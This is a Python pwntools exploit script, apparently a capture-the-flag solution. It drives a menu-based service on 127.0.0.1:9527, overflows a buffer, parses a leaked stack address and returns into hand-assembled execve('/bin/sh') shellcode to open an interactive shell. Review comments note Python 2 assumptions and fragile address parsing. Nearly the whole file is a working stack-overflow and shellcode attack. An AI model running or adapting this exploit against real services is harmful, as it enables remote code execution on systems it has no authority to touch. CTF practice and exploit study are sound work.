from pwn import *

# Binary / libc handles are commented out in the original; the script only
# talks to the remote service and never loads the ELF locally.
#elf = ELF('./pwn')
#libc = elf.libc
#/lib/x86_64-linux-gnu/libc-2.23.so

# asm()/p64() below assume a 64-bit Linux target.
context(arch = 'amd64', os = 'linux')


def exp(IP, PORT):
    """Drive the menu-based service at IP:PORT and return the live tube.

    The interaction has three steps, each keyed on the service's
    'Enter your choice:' prompt:
      1. option '3' with a fixed-layout buffer (payload1),
      2. option '2', whose reply 'It is magic: [0x...' is parsed as a
         12-hex-digit stack address,
      3. option '3' again with payload2, which embeds the asm() output and
         the address read in step 2.

    Args:
        IP: host of the service.
        PORT: TCP port of the service.

    Returns:
        The pwntools tube (``remote``) still connected; the caller is
        expected to hand it to ``p.interactive()``.

    NOTE(review): str + p64()/asm() concatenation indicates Python 2 era
    pwntools; under Python 3 these helpers return bytes and the ``+`` lines
    would raise TypeError — confirm the intended interpreter.
    """
    p = remote(IP, PORT)
    #p = process('./pwn')
    p.sendlineafter('Enter your choice:\n', '3')
    # 0x28 filler bytes, an 8-byte value, 4 bytes 'qqqq', then 8 more bytes.
    # Meaning of 0x12345678 and 0x400809 is not visible here — presumably a
    # value the service compares against and an address inside ./pwn; verify
    # against the binary before reusing on another build.
    payload1 = 'a'*0x28 + p64(0x12345678) + 'qqqq' + p64(0x400809)
    p.sendafter('What?', payload1)
    p.sendlineafter('Enter your choice:\n', '2')
    p.recvuntil('It is magic: [0x')
    # recvn(12) assumes the service always prints exactly 12 hex digits;
    # a shorter address (leading zeros stripped) would mis-parse here.
    stack = int(p.recvn(12), 16)
    #log.success(hex(stack))
    shellcode_addr = stack
    shellcode = ""
    #shellcode += asm('push 0')
    shellcode += asm('mov dword ptr [rsp], 0x6e69622f')
    shellcode += asm('mov dword ptr [rsp+4], 0x0068732f')
    shellcode += asm('mov rdi, rsp')
    shellcode += asm('xor rsi, rsi')
    shellcode += asm('xor rdx, rdx')
    shellcode += asm('xor rax, rax')
    shellcode += asm('mov rax, 59')
    shellcode += asm('syscall')
    # ljust() pads but never truncates: if the asm() output ever exceeds
    # 0x38 bytes the trailing p64 shifts out of its expected slot. The
    # commented-out print below was evidently used to check that length.
    payload2 = shellcode.ljust(0x38, '\0') + p64(shellcode_addr)
    #gdb.attach(p, 'b *0x400881\nb *0x400896')
    p.sendlineafter('Enter your choice:\n', '3')
    p.sendafter('What?', payload2)
    #print hex(len(shellcode))
    # 'a' is not one of the numeric menu options used above; presumably an
    # invalid choice makes the service return and trigger the overwritten
    # control flow — confirm against the binary.
    p.sendlineafter('Enter your choice:\n', 'a')
    return p


if __name__ == '__main__':
    # Local test target; the port is hard-coded here rather than taken
    # from argv.
    p = exp('127.0.0.1', 9527)
    p.interactive()
    # 2f 62 69 6e 2f 73 68/bin/sh
    #//bin/sh